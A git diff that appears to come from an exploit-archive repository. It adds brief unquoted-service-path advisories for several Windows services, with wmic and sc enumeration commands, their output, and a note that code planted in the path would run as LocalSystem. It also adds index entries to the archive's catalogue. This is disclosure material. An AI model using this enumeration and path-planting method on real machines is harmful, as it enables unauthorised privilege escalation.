+ CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Microvirt\MEmu\MemuService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : MEmusvc + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/49017.txt b/exploits/windows/local/49017.txt new file mode 100644 index 000000000..086c7c317 --- /dev/null +++ b/exploits/windows/local/49017.txt @@ -0,0 +1,26 @@ +#Exploit Title: Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path +#Exploit Author : SamAlucard +#Exploit Date: 2020-11-07 +#Vendor : Magic Utilities Pty +#Version : 64-bit 2.20 +#Vendor Homepage : https://magicutilities.net/magic-mouse/home +#Tested on OS: Windows 10 Home + + +#Analyze PoC : +============== + +C:\>sc qc "magicmouse2service" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: magicmouse2service + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Magic Mouse 2 - +Utilities\MagicMouse2Service.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Magic Mouse 2 Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/49018.txt b/exploits/windows/local/49018.txt new file mode 100644 index 000000000..795fd496c --- /dev/null +++ b/exploits/windows/local/49018.txt @@ -0,0 +1,30 @@ +# Exploit Title: iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path +# Discovery by: Leslie Lara +# Discovery Date: 7-09-2020 +# Vendor Homepage: https://www.huawei.com/en/corporate-information +# Software Links : https://www.advanceduninstaller.com/iDesk-3_0_2_1-ac22913ee90dd58ca897d1ddf3d62a8f-application.htm +# Tested Version: 3.0.2.1 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro 64 bits + +# Step to discover Unquoted Service Path: + + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ +iDeskService + iDeskService C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe + Auto + +C:\>sc qc "iDeskService" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: iDeskService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : iDeskService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/49019.txt b/exploits/windows/local/49019.txt new file mode 100644 index 000000000..34663a627 --- /dev/null +++ b/exploits/windows/local/49019.txt @@ -0,0 +1,35 @@ +# Exploit Title: Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path +# Discovery by: Carlos Roa +# Discovery Date: 2020-11-07 +# Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home +# Tested Version: 5.1.0.8 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 7 Professional 64 bits (spanish) + +# Step to discover Unquoted Service Path: + +C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto| findstr /i /v "C:\Windows\\" | findstr /i /v """ + +Canon Inkjet Printer/Scanner/Fax Extended Survey Program IJPLMSVC C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE Auto + + +# Service info: + +C:\Users>sc qc IJPLMSVC +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: ijplmsvc + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Canon Inkjet Printer/Scanner/Fax Extended Survey Program + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/49020.txt b/exploits/windows/local/49020.txt new file mode 100644 index 000000000..924b538c5 --- /dev/null +++ b/exploits/windows/local/49020.txt @@ -0,0 +1,37 @@ +# Exploit Title: Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path +# Discovery by: Paulina Girón +# Discovery Date: 2020-11-07 +# Vendor Homepage: https://www.deepinstinct.com/ +# Software Links : https://www.deepinstinct.com/2019/05/22/hp-collaborates-with-deep-instinct-to-roll-out-ai-powered-malware-protection-for-next-generation-hp-elitebook-and-zbook-pcs/ +# Tested Version: 1.2.24.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Microsoft Windows 10 Pro 64 bits +1) + +C:\> wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DeepNetworkService" |findstr /i /v """ + +Deep Instinct Network Service DeepNetworkService C:\Program Files\HP Sure Sense\DeepNetworkService.exe Auto + +2) + +C:\> sc qc "DeepNetworkService" + +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: DeepNetworkService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\HP Sure Sense\DeepNetworkService.exe + GRUPO_ORDEN_CARGA : FSFilter Anti-Virus + ETIQUETA : 0 + NOMBRE_MOSTRAR : Deep Instinct Network Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + + +#Description Exploit: +# A successful attempt would require the local user to be able to insert their code in the system root path +# undetected by the OS or other security applications where it could potentially be executed during +# application startup or reboot. If successful, the local user's code would execute with the elevated +# privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/49021.txt b/exploits/windows/local/49021.txt new file mode 100644 index 000000000..ba1d13f15 --- /dev/null +++ b/exploits/windows/local/49021.txt @@ -0,0 +1,32 @@ +# Exploit Title: RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path +# Discovery by: Erick Galindo +# Discovery Date: 2020-11-07 +# Vendor Homepage: https://www.real.com/ +# Tested Version: 18.1.4 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 7 Enterprise SP1 x64 es +# Step to discover Unquoted Service Path: + +c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr +/i /v "C:\Windows\\" | findstr /i /v "RealTimes" | findstr /i /v """ + +RealTimes Desktop Service RealTimes Desktop Service c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe Auto + +# Service info + +sc qc "RealTimes Desktop Service" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: RealTimes Desktop Service + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : RealTimes Desktop Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + #Exploit: + +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/exploits/windows/local/49022.txt b/exploits/windows/local/49022.txt new file mode 100644 index 000000000..26cbaf533 --- /dev/null +++ b/exploits/windows/local/49022.txt @@ -0,0 +1,101 @@ +# Exploit Title: DiskBoss v11.7.28 - Multiple Services Unquoted Service Path +# Date: 2020-8-20 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: https://www.diskboss.com/ +# Software Link: https://www.diskboss.com/downloads.html +# Version: v11.7.28 +# Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763 + +# Product | Version +# DiskBoss v11.7.28 +# DiskBoss Pro v11.7.28 +# DiskBoss Ultimate v11.7.28 +# DiskBoss Server v11.7.28 +# DiskBoss Enterprise v11.7.28 + +# All the listed products are vulnerable to Unquoted Service path. Any low privileged user can elevate their privileges using any of these services. + +# Services info: + +C:\Users\m507>sc qc "DiskBoss Service" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: DiskBoss Service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files\DiskBoss\bin\diskbsa.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : DiskBoss Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + +C:\Users\m507>sc qc "DiskBoss Enterprise" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: DiskBoss Enterprise + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Enterprise\bin\diskbss.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : DiskBoss Enterprise + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + +C:\Users\m507>sc qc "DiskBoss Ultimate Service" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: DiskBoss Ultimate Service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Ultimate\bin\diskbsa.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : DiskBoss Ultimate Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + +C:\Users\m507>sc qc "DiskBoss Server" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: DiskBoss Server + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Server\bin\diskbss.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : DiskBoss Server + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + +C:\Users\m507>sc qc "DiskBoss Pro Service" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: DiskBoss Pro Service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Pro\bin\diskbsa.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : DiskBoss Pro Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + +# Exploit: +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/exploits/windows/local/49023.txt b/exploits/windows/local/49023.txt new file mode 100644 index 000000000..b05616a14 --- /dev/null +++ b/exploits/windows/local/49023.txt @@ -0,0 +1,28 @@ +# Exploit Title: Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path +# Date: 2020-8-20 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: https://www.cybertronsoft.com/ +# Software Link: https://www.cybertronsoft.com/download/privacy-drive-setup.exe +# Version: Version 3.17.0 Build 1456 +# Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763 + +# Service info: + +C:\Users\m507>sc qc PDSvc +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: PDSvc + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Cybertron\Privacy Drive\pdsvc.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : PrivacyDrive Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + +# Exploit: +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index edc97f493..4d7871005 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10400,6 +10400,27 @@ id,file,description,date,author,type,platform,port 48982,exploits/windows/local/48982.pdf,"Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)",2020-11-02,"Nassim Asrir",local,windows, 48983,exploits/windows/local/48983.txt,"Quick N Easy FTP Service 3.2 - Unquoted Service Path",2020-11-02,yunaranyancat,local,windows, 48993,exploits/windows/local/48993.pl,"Amarok 2.8.0 - Denial-of-Service",2020-11-05,FishballAndMeatball,local,windows, +49002,exploits/windows/local/49002.txt,"HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows, +49003,exploits/windows/local/49003.txt,"KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path",2020-11-09,SamAlucard,local,windows, +49004,exploits/windows/local/49004.txt,"Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows, +49005,exploits/windows/local/49005.txt,"OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows, +49006,exploits/windows/local/49006.txt,"IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows, +49007,exploits/windows/local/49007.txt,"Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path",2020-11-09,SamAlucard,local,windows, +49008,exploits/windows/local/49008.txt,"DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path",2020-11-09,SamAlucard,local,windows, +49009,exploits/windows/local/49009.txt,"Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows, +49010,exploits/windows/local/49010.txt,"HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path",2020-11-09,"Jocelyn Arenas",local,windows, +49011,exploits/windows/local/49011.txt,"Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows, +49012,exploits/windows/local/49012.txt,"Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows, +49013,exploits/windows/local/49013.txt,"Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows, +49014,exploits/windows/local/49014.txt,"Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows, +49016,exploits/windows/local/49016.txt,"MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path",2020-11-09,SamAlucard,local,windows, +49017,exploits/windows/local/49017.txt,"Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows, +49018,exploits/windows/local/49018.txt,"iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path",2020-11-09,"Leslie Lara",local,windows, +49019,exploits/windows/local/49019.txt,"Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path",2020-11-09,"Carlos Roa",local,windows, +49020,exploits/windows/local/49020.txt,"Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path",2020-11-09,"Paulina Girón",local,windows, +49021,exploits/windows/local/49021.txt,"RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path",2020-11-09,"Erick Galindo",local,windows, +49022,exploits/windows/local/49022.txt,"DiskBoss v11.7.28 - Multiple Services Unquoted Service Path",2020-11-09,"Mohammed Alshehri",local,windows, +49023,exploits/windows/local/49023.txt,"Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path",2020-11-09,"Mohammed Alshehri",local,windows, 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux, 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, @@ -40818,6 +40839,9 @@ id,file,description,date,author,type,platform,port 48997,exploits/php/webapps/48997.py,"Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated)",2020-11-06,"Fatih Çelik",webapps,php, 48998,exploits/php/webapps/48998.py,"Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated)",2020-11-06,"Fatih Çelik",webapps,php, 48999,exploits/aspx/webapps/48999.txt,"BlogEngine 3.3.8 - 'Content' Stored XSS",2020-11-06,"Andrey Stoykov",webapps,aspx, +49000,exploits/hardware/webapps/49000.txt,"Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF",2020-11-09,"Jinson Varghese Behanan",webapps,hardware, +49001,exploits/php/webapps/49001.py,"SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)",2020-11-09,"M. Cory Billington",webapps,php, +49024,exploits/multiple/webapps/49024.txt,"Joplin 1.2.6 - 'link' Cross Site Scripting",2020-11-09,"Philip Holbrook",webapps,multiple, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,